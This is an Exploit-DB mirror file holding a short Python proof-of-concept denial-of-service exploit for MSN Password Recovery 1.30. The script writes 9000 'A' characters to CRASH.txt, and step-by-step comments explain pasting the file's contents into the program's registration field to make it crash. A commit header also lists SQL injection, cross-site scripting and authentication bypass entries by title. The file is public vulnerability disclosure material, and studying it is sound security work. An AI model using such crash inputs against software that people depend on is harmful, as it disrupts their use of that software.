exploit-db-mirror/exploits/windows/dos/47839.py
Offensive Security 3b67743b55 DB: 2020-01-03
4 changes to exploits/shellcodes

MSN Password Recovery 1.30 - Denial of Service (PoC)
Hospital Management System 4.0 - 'searchdata' SQL Injection
Hospital Management System 4.0 - Persistent Cross-Site Scripting
BloodX 1.0 - Authentication Bypass
2020-01-03 05:02:00 +00:00

22 lines
No EOL
768 B
Python
Executable file

# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-02
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
# Exploit Author: Gokkulraj
# Tested Version: v1.30
# Tested on: Windows 7 x64
# 1.- Download and install MSN Password Recovery
# 2.- Run python code : MSN Password Recovery.py
# 3.- Open CRASH.txt and copy content to clipboard
# 4.- Open MSN Password Recovery and Click 'EnterKey'
# 5.- Paste the content of CRASH.txt into the Field: 'User Name and
Registration Code'
# 6.- click 'OK' you will see a crash.
#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('CRASH.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")